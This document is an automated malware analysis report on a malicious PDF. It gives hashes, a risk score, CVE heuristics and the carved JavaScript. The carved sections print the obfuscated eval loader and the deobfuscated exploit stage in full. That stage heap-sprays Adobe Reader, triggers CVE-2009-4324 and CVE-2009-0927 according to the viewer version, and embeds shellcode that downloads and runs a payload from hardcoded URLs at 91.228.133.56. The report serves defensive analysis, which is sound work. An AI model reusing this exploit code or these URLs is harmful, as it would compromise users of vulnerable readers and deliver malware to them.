Malicious PDF — malware analysis report

Static analysis result for SHA-256 c1823c01e8d6f507…

MALICIOUS

PDF

13.3 KB First seen: 2026-05-08
MD5: 5ae4998b08198a506ae09607a0b38c50 SHA-1: 59497d4aeab456a3384c98a4893769445b1113fa SHA-256: c1823c01e8d6f507f35e8aee3c305159bc52f837a1b229a0971b164ef707f5cd
310 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 9

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://91.228.133.56/dng290911/db1523498df7965a4ccd8abc43397f6d/d7.php?f=g Referenced by PDF JavaScript
    • http://91.228.133.56/dng290911/db1523498df7965a4ccd8abc43397f6d/d8.php?f=nReferenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0076_000.js pdf-javascript-stream PDF /JS object 76 at offset 0x38A 12576 bytes
SHA-256: 7e24e2397749aaf5e2f1c3a3962629f5b86ddf77b5f17205976ec08c6f4fba57
Preview script
First 1,000 lines of the extracted script
a="2_E70I8p}@]|eoF ,:4iwn'9+VvdA3-1yC=btr{>.5%lPS6B[DxNcah<f&ug(;m)s";
w='';
w+='sl';
w+='i';
w+="c"+a[12];
j='b343tb3g';
j=j[w];
z
=new Array
(26,53,37,15,1,31,13,34,22,42,58,6,29,46,46,42,58,14,33,2,18,42,58,6,41,14,33,42,58,3,41,2,18,42,58,2,23,29,18,42,58,29,29,41,14,42,58,46,18,33,4,42,58,18,4,6,47,42,58,6,47,29,4,42,58,4,33,18,4,42,58,3,4,6,47,42,58,41,46,31,33,42,58,3,46,6,47,42,58,29,29,4,6,42,58,46,46,49,47,42,58,41,2,6,47,42,58,4,29,29,33,42,58,29,29,3,18,42,58,6,31,0,33,42,58,31,41,2,2,42,58,14,14,31,4,42,58,47,6,14,14,42,58,18,4,6,47,42,58,33,29,29,4,42,58,29,23,18,46,42,58,3,41,4,46,42,58,6,3,14,47,42,58,0,18,29,18,42,58,2,18,6,41,42,58,41,31,3,41,42,58,2,47,2,23,42,58,41,31,18,33,42,58,6,47,41,46,42,58,29,33,3,41,42,58,3,18,6,47,42,58,3,6,29,41,42,58,14,41,4,29,42,58,6,47,41,46,42,58,0,4,3,46,42,58,14,41,4,29,42,58,33,23,29,29,42,58,18,31,18,23,42,58,28,49,14,33,42,58,33,41,4,29,42,58,49,47,29,29,42,58,47,2,4,14,42,58,29,6,31,4,42,58,3,18,14,0,42,58,33,31,4,6,42,58,4,49,33,47,42,58,49,28,4,29,42,58,2,47,18,4,42,58,29,47,14,31,42,58,3,41,31,14,42,58,41,2,2,46,42,58,41,2,6,47,42,58,4,29,0,18,42,58,46,46,49,49,42,58,4,33,6,47,42,58,6,49,18,47,42,58,2,33,18,46,42,58,41,18,14,14,42,58,4,33,0,18,42,58,49,6,6,47,42,58,49,49,4,29,42,58,4,18,6,47,42,58,4,29,6,47,42,58,28,47,33,41,42,58,41,23,41,2,42,58,2,47,33,29,42,58,28,49,41,29,42,58,46,6,6,47,42,58,6,4,0,4,42,58,4,33,3,49,42,58,3,18,29,29,42,58,23,46,4,29,42,58,14,29,2,47,42,58,46,6,6,47,42,58,6,47,4,6,42,58,46,28,14,3,42,58,41,23,4,41,42,58,23,6,2,6,42,58,14,14,14,14,42,58,2,0,14,14,42,58,2,6,14,23,42,58,4,4,4,4,42,58,4,4,4,4,42,58,41,4,41,6,42,58,18,4,46,28,42,58,14,14,46,6,42,58,4,4,4,4,42,58,41,4,4,4,42,58,33,4,6,29,42,58,41,4,31,23,42,58,6,47,41,41,42,58,6,47,2,33,42,58,31,4,41,2,42,58,33,29,6,29,42,58,14,14,4,41,42,58,46,6,2,29,42,58,46,2,46,14,42,58,4,4,4,4,42,58,3,41,46,6,42,58,46,33,3,0,42,58,41,18,46,49,42,58,31,46,14,14,42,58,33,18,6,29,42,58,6,47,4,6,42,58,2,6,2,6,42,58,14,14,46,31,42,58,14,14,14,14,42,58,4,0,2,47,42,58,3,0,2,47,42,58,2,33,6,31,42,58,4,31,4,18,42,58,4,4,4,4,42,58,41,33,6,49,42,58,4,33,0,18,42,58,4,18,33,3,42,58,3,0,0,18,42,58,46,3,46,41,42,58,33,3,3,29,42,58,0,18,18,18,42,58,3,46,4,18,42,58,29,29,3,0,42,58,33,3,29,0,42,58,0,18,18,18,42,58,0,4,4,6,42,58,3,29,0,49,42,58,41,29,0,4,42,58,14,6,46,6,42,58,4,4,4,4,42,58,14,14,4,4,42,58,4,33,41,46,42,58,2,6,6,47,42,58,33,23,29,29,42,58,33,3,41,31,42,58,31,49,18,18,42,58,3,3,4,4,42,58,46,0,3,4,42,58,33,3,3,18,42,58,31,49,18,18,42,58,0,2,4,41,42,58,46,33,46,18,42,58,33,46,46,33,42,58,31,49,18,18,42,58,4,4,4,23,42,58,6,28,41,23,42,58,4,18,33,31,42,58,6,6,29,4,42,58,31,49,18,18,42,58,18,31,4,18,42,58,46,28,41,31,42,58,46,28,4,4,42,58,41,29,4,4,42,58,46,28,41,3,42,58,14,14,4,4,42,58,31,18,41,46,42,58,33,4,6,41,42,58,31,46,3,41,42,58,4,4,46,28,42,58,14,14,41,29,42,58,4,18,41,46,42,58,4,4,46,28,42,58,2,47,6,29,42,58,41,29,4,33,42,58,41,46,14,14,42,58,6,29,4,18,42,58,4,33,33,29,42,58,4,0,2,47,42,58,31,29,2,47,42,58,6,4,18,3,42,58,4,4,29,14,42,58,14,28,3,41,42,58,6,4,18,3,42,58,4,4,29,14,42,58,33,18,3,41,42,58,4,4,46,28,42,58,14,2,46,28,42,58,41,46,14,14,42,58,2,6,4,6,42,58,14,2,23,33,42,58,14,14,14,14,42,58,18,2,6,2,42,58,2,33,4,2,42,58,14,2,23,6,42,58,4,2,6,28,42,58,46,14,6,23,42,58,47,49,4,31,42,58,33,28,29,29,42,58,41,47,6,28,42,58,33,46,31,47,42,58,3,23,18,46,42,58,31,28,29,46,42,58,3,4,0,14,42,58,3,18,46,6,42,58,3,4,3,18,42,58,0,14,29,28,42,58,29,23,0,14,42,58,0,2,29,31,42,58,29,0,29,0,42,58,0,2,29,6,42,58,29,29,29,31,42,58,0,2,29,29,42,58,29,46,29,41,42,58,46,18,0,14,42,58,46,3,46,2,42,58,29,23,29,0,42,58,29,23,29,4,42,58,29,31,29,31,42,58,46,18,0,14,42,58,29,31,46,0,42,58,29,0,29,41,42,58,29,18,29,29,42,58,29,6,29,23,42,58,46,46,46,18,42,58,29,23,29,3,42,58,29,41,29,46,42,58,29,18,46,31,42,58,46,29,46,29,42,58,29,6,46,18,42,58,46,0,46,31,42,58,29,18,46,29,42,58,29,29,29,29,42,58,29,3,29,23,42,58,29,46,46,46,42,58,0,14,46,18,42,58,29,3,46,18,42,58,3,4,0,2,42,58,3,4,46,6,42,58,46,46,29,14,42,58,46,3,29,49,42,58,4,4,4,4,22,61,26,53,37,15,1,0,13,34,22,42,58,6,29,46,46,42,58,14,33,2,18,42,58,6,41,14,33,42,58,3,41,2,18,42,58,2,23,29,18,42,58,29,29,41,14,42,58,46,18,33,4,42,58,18,4,6,47,42,58,6,47,29,4,42,58,4,33,18,4,42,58,3,4,6,47,42,58,41,46,31,33,42,58,3,46,6,47,42,58,29,29,4,6,42,58,46,46,49,47,42,58,41,2,6,47,42,58,4,29,29,33,42,58,29,29,3,18,42,58,6,31,0,33,42,58,31,41,2,2,42,58,14,14,31,4,42,58,47,6,14,14,42,58,18,4,6,47,42,58,33,29,29,4,42,58,29,23,18,46,42,58,3,41,4,46,42,58,6,3,14,47,42,58,0,18,29,18,42,58,2,18,6,41,42,58,41,31,3,41,42,58,2,47,2,23,42,58,41,31,18,33,42,58,6,47,41,46,42,58,29,33,3,41,42,58,3,18,6,47,42,58,3,6,29,41,42,58,14,41,4,29,42,58,6,47,41,46,42,58,0,4,3,46,42,58,14,41,4,29,42,58,33,23,29,29,42,58,18,31,18,23,42,58,28,49,14,33,42,58,33,41,4,29,42,58,49,47,29,29,42,58,47,2,4,14,42,58,29,6,31,4,42,58,3,18,14,0,42,58,33,31,4,6,42,58,4,49,33,47,42,58,49,28,4,29,42,58,2,47,18,4,42,58,29,47,14,31,42,58,3,41,31,14,42,58,41,2,2,46,42,58,41,2,6,47,42,58,4,29,0,18,42,58,46,46,49,49,42,58,4,33,6,47,42,58,6,49,18,47,42,58,2,33,18,46,42,58,41,18,14,14,42,58,4,33,0,18,42,58,49,6,6,47,42,58,49,49,4,29,42,58,4,18,6,47,42,58,4,29,6,47,42,58,28,47,33,41,42,58,41,23,41,2,42,58,2,47,33,29,42,58,28,49,41,29,42,58,46,6,6,47,42,58,6,4,0,4,42,58,4,33,3,49,42,58,3,18,29,29,42,58,23,46,4,29,42,58,14,29,2,47,42,58,46,6,6,47,42,58,6,47,4,6,42,58,46,28,14,3,42,58,41,23,4,41,42,58,23,6,2,6,42,58,14,14,14,14,42,58,2,0,14,14,42,58,2,6,14,23,42,58,4,4,4,4,42,58,4,4,4,4,42,58,41,4,41,6,42,58,18,4,46,28,42,58,14,14,46,6,42,58,4,4,4,4,42,58,41,4,4,4,42,58,33,4,6,29,42,58,41,4,31,23,42,58,6,47,41,41,42,58,6,47,2,33,42,58,31,4,41,2,42,58,33,29,6,29,42,58,14,14,4,41,42,58,46,6,2,29,42,58,46,2,46,14,42,58,4,4,4,4,42,58,3,41,46,6,42,58,46,33,3,0,42,58,41,18,46,49,42,58,31,46,14,14,42,58,33,18,6,29,42,58,6,47,4,6,42,58,2,6,2,6,42,58,14,14,46,31,42,58,14,14,14,14,42,58,4,0,2,47,42,58,3,0,2,47,42,58,2,33,6,31,42,58,4,31,4,18,42,58,4,4,4,4,42,58,41,33,6,49,42,58,4,33,0,18,42,58,4,18,33,3,42,58,3,0,0,18,42,58,46,3,46,41,42,58,33,3,3,29,42,58,0,18,18,18,42,58,3,46,4,18,42,58,29,29,3,0,42,58,33,3,29,0,42,58,0,18,18,18,42,58,0,4,4,6,42,58,3,29,0,49,42,58,41,29,0,4,42,58,14,6,46,6,42,58,4,4,4,4,42,58,14,14,4,4,42,58,4,33,41,46,42,58,2,6,6,47,42,58,33,23,29,29,42,58,33,3,41,31,42,58,31,49,18,18,42,58,3,3,4,4,42,58,46,0,3,4,42,58,33,3,3,18,42,58,31,49,18,18,42,58,0,2,4,41,42,58,46,33,46,18,42,58,33,46,46,33,42,58,31,49,18,18,42,58,4,4,4,23,42,58,6,28,41,23,42,58,4,18,33,31,42,58,6,6,29,4,42,58,31,49,18,18,42,58,18,31,4,18,42,58,46,28,41,31,42,58,46,28,4,4,42,58,41,29,4,4,42,58,46,28,41,3,42,58,14,14,4,4,42,58,31,18,41,46,42,58,33,4,6,41,42,58,31,46,3,41,42,58,4,4,46,28,42,58,14,14,41,29,42,58,4,18,41,46,42,58,4,4,46,28,42,58,2,47,6,29,42,58,41,29,4,33,42,58,41,46,14,14,42,58,6,29,4,18,42,58,4,33,33,29,42,58,4,0,2,47,42,58,31,29,2,47,42,58,6,4,18,3,42,58,4,4,29,14,42,58,14,28,3,41,42,58,6,4,18,3,42,58,4,4,29,14,42,58,33,18,3,41,42,58,4,4,46,28,42,58,14,2,46,28,42,58,41,46,14,14,42,58,2,6,4,6,42,58,14,2,23,33,42,58,14,14,14,14,42,58,18,2,6,2,42,58,2,33,4,2,42,58,14,2,23,6,42,58,4,2,6,28,42,58,46,14,6,23,42,58,47,49,4,31,42,58,33,28,29,29,42,58,41,47,6,28,42,58,33,46,31,47,42,58,3,23,18,46,42,58,31,28,29,46,42,58,3,4,0,14,42,58,3,18,46,6,42,58,3,4,3,18,42,58,0,14,29,28,42,58,29,23,0,14,42,58,0,2,29,31,42,58,29,0,29,0,42,58,0,2,29,6,42,58,29,29,29,31,42,58,0,2,29,29,42,58,29,46,29,41,42,58,46,18,0,14,42,58,46,3,46,2,42,58,29,23,29,0,42,58,29,23,29,4,42,58,29,31,29,31,42,58,46,18,0,14,42,58,29,31,46,0,42,58,29,0,29,41,42,58,29,18,29,29,42,58,29,6,29,23,42,58,46,46,46,18,42,58,29,23,29,3,42,58,29,41,29,46,42,58,29,18,46,31,42,58,46,29,46,29,42,58,29,6,46,18,42,58,46,0,46,31,42,58,29,18,46,29,42,58,29,29,29,29,42,58,29,3,29,23,42,58,29,46,46,46,42,58,0,14,46,18,42,58,29,6,46,18,42,58,3,4,0,2,42,58,3,4,46,6,42,58,46,46,29,14,42,58,46,2,29,49,42,58,4,4,4,4,22,61,56,58,21,52,36,19,13,21,15,1,29,13,60,63,38,26,53,37,15,1,18,13,34,53,7,7,40,26,19,12,20,12,37,25,12,37,64,19,13,21,40,36,13,45,36,37,19,21,59,60,63,61,1,18,13,34,1,18,13,40,37,12,7,43,53,52,12,60,22,40,22,16,22,22,63,61,20,54,19,43,12,60,1,18,13,40,43,12,21,59,36,54,55,18,63,38,1,18,13,24,34,22,4,22,61,8,1,18,13,34,7,53,37,64,12,5,21,36,60,1,18,13,16,31,4,63,61,37,12,36,58,37,21,15,1,18,13,61,8,56,58,21,52,36,19,13,21,15,1,41,13,60,63,38,56,58,21,52,36,19,13,21,15,1,46,13,60,63,38,26,53,37,15,1,3,13,34,22,7,9,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,15,17,15,32,32,32,32,31,31,31,22,61,58,36,19,43,40,7,37,19,21,36,27,60,1,3,13,16,21,12,20,15,49,53,36,12,60,63,63,61,8,26,53,37,15,1,6,13,34,31,0,4,4,4,61,1,23,13,34,21,12,20,15,28,37,37,53,32,60,63,61,26,53,37,15,1,31,13,4,34,22,42,58,23,4,23,4,42,58,23,4,23,4,22,61,26,53,37,15,1,31,13,31,34,1,0,13,61,1,31,13,4,34,58,21,12,64,52,53,7,12,60,1,31,13,4,63,61,1,31,13,31,34,58,21,12,64,52,53,7,12,60,1,31,13,31,63,61,20,54,19,43,12,60,1,31,13,4,40,43,12,21,59,36,54,55,34,4,50,6,4,4,4,63,38,1,31,13,4,24,34,1,31,13,4,61,8,1,31,13,4,34,1,31,13,4,40,64,58,35,64,36,37,60,4,16,4,50,6,4,4,4,30,1,31,13,31,40,43,12,21,59,36,54,63,61,15,56,13,37,60,1,31,13,0,34,4,61,1,31,13,0,55,1,6,13,61,1,31,13,0,24,24,63,38,1,23,13,48,1,31,13,0,10,34,1,31,13,4,24,1,31,13,31,61,8,19,56,60,1,6,13,63,38,1,46,13,60,63,61,1,46,13,60,63,61,36,37,32,38,36,54,19,64,40,62,12,27,19,53,40,21,12,20,44,43,53,32,12,37,60,21,58,43,43,63,61,8,52,53,36,52,54,60,12,63,38,8,1,46,13,60,63,61,8,8,56,58,21,52,36,19,13,21,15,1,31,13,29,60,63,38,26,53,37,15,1,31,13,18,34,58,21,12,64,52,53,7,12,60,1,31,13,63,61,1,31,13,41,34,58,21,12,64,52,53,7,12,60,22,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,42,58,23,4,23,4,22,63,24,1,31,13,18,61,1,31,13,46,34,58,21,12,64,52,53,7,12,60,22,42,58,23,4,23,4,42,58,23,4,23,4,22,63,61,1,31,13,3,34,31,4,61,1,31,13,6,34,1,31,13,3,24,1,31,13,41,40,43,12,21,59,36,54,61,20,54,19,43,12,60,1,31,13,46,40,43,12,21,59,36,54,55,1,31,13,6,63,1,31,13,46,24,34,1,31,13,46,61,1,31,13,23,34,1,31,13,46,40,64,58,35,64,36,37,19,21,59,60,4,16,1,31,13,6,63,61,1,0,13,0,34,1,31,13,46,40,64,58,35,64,36,37,19,21,59,60,4,16,1,31,13,46,40,43,12,21,59,36,54,30,1,31,13,6,63,61,20,54,19,43,12,60,1,0,13,0,40,43,12,21,59,36,54,24,1,31,13,6,55,4,50,18,4,4,4,4,63,1,0,13,0,34,1,0,13,0,24,1,0,13,0,24,1,31,13,23,61,1,0,13,4,34,21,12,20,15,28,37,37,53,32,60,63,61,56,13,37,60,1,0,13,31,34,4,61,1,0,13,31,55,31,6,4,61,1,0,13,31,24,24,63,1,0,13,4,48,1,0,13,31,10,34,1,0,13,0,24,1,31,13,41,61,26,53,37,15,1,0,13,29,34,18,4,31,0,61,26,53,37,15,1,0,13,18,34,28,37,37,53,32,60,1,0,13,29,63,61,56,13,37,60,1,0,13,31,34,4,61,1,0,13,31,55,1,0,13,29,61,1,0,13,31,24,24,63,38,1,0,13,18,48,1,0,13,31,10,34,58,21,12,64,52,53,7,12,60,22,42,4,53,42,4,53,42,4,53,42,4,53,22,63,61,8,33,13,43,43,53,35,40,59,12,36,5,52,13,21,60,1,0,13,18,24,22,1,51,40,35,58,21,27,43,12,22,63,61,8,26,53,37,15,1,18,13,34,1,29,13,60,63,61,19,56,60,60,60,1,18,13,39,6,23,41,4,63,57,57,60,1,18,13,55,23,4,41,4,63,63,11,11,60,60,1,18,13,39,34,6,4,4,4,63,57,57,60,1,18,13,55,34,6,31,4,0,63,63,63,38,1,31,13,29,60,63,61,8,12,43,64,12,15,19,56,60,60,1,18,13,39,34,23,31,4,4,63,11,11,60,1,18,13,55,34,23,0,4,4,63,11,11,60,1,18,13,39,34,6,31,4,29,63,11,11,60,1,18,13,55,34,6,31,4,3,63,63,38,1,41,13,60,63,61,8);
s='';
b
=
'al';
b2
=a[12]
+
a[26]+b;for
(i=0;i<z.length;i++)
{s+=a[z[i]]}
e=(j());
e=e[b2];
e(s);
generic_stage_recovery_000.js deobfuscated-js generic stage recovery alphabet-index-array from JavaScript object 76 at offset 0x38A 4469 bytes
SHA-256: 3635ce3d4a495b9dcc1ba7c03f6ba31653c2be2d262c647cbfb0d59269b27002
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 6 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var _1o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F%u2E31%u3232%u2E38%u3331%u2E33%u3635%u642F%u676E%u3932%u3930%u3131%u642F%u3162%u3235%u3433%u3839%u6664%u3937%u3536%u3461%u6363%u3864%u6261%u3463%u3333%u3739%u3666%u2F64%u3764%u702E%u7068%u663F%u673D%u0000';var _2o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F%u2E31%u3232%u2E38%u3331%u2E33%u3635%u642F%u676E%u3932%u3930%u3131%u642F%u3162%u3235%u3433%u3839%u6664%u3937%u3536%u3461%u6363%u3864%u6261%u3463%u3333%u3739%u3666%u2F64%u3864%u702E%u7068%u663F%u6E3D%u0000';function _3o(){var _4o=app.viewerVersion.toString();_4o=_4o.replace('.','');while(_4o.length<4){_4o+='0';}_4o=parseInt(_4o,10);return _4o;}function _5o(){function _6o(){var _7o='p@111111111111111111111111 : yyyy111';util.printd(_7o,new Date());}var _8o=12000;_9o=new Array();var _1o0='%u9090%u9090';var _1o1=_2o;_1o0=unescape(_1o0);_1o1=unescape(_1o1);while(_1o0.length<=0x8000){_1o0+=_1o0;}_1o0=_1o0.substr(0,0x8000-_1o1.length); for(_1o2=0;_1o2<_8o;_1o2++){_9o[_1o2]=_1o0+_1o1;}if(_8o){_6o();_6o();try{this.media.newPlayer(null);}catch(e){}_6o();}}function _1o3(){var _1o4=unescape(_1o);_1o5=unescape('%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090')+_1o4;_1o6=unescape('%u9090%u9090');_1o7=10;_1o8=_1o7+_1o5.length;while(_1o6.length<_1o8)_1o6+=_1o6;_1o9=_1o6.substring(0,_1o8);_2o2=_1o6.substring(0,_1o6.length-_1o8);while(_2o2.length+_1o8<0x40000)_2o2=_2o2+_2o2+_1o9;_2o0=new Array();for(_2o1=0;_2o1<180;_2o1++)_2o0[_2o1]=_2o2+_1o5;var _2o3=4012;var _2o4=Array(_2o3);for(_2o1=0;_2o1<_2o3;_2o1++){_2o4[_2o1]=unescape('%0a%0a%0a%0a');}Collab.getIcon(_2o4+'_N.bundle');}var _4o=_3o();if(((_4o>8950)&&(_4o<9050))||((_4o>=8000)&&(_4o<=8102))){_1o3();}else if((_4o>=9100)||(_4o<=9200)||(_4o>=8103)||(_4o<=8107)){_5o();}
generic_stage_recovery_001.js deobfuscated-js generic stage recovery percent-decode from JavaScript object 76 at offset 0x38A 4461 bytes
SHA-256: eaf167ee186b02b8eb5dfd37cf0efb79c48d4a98e0b69649137bbdd4f0132b18
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 6 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
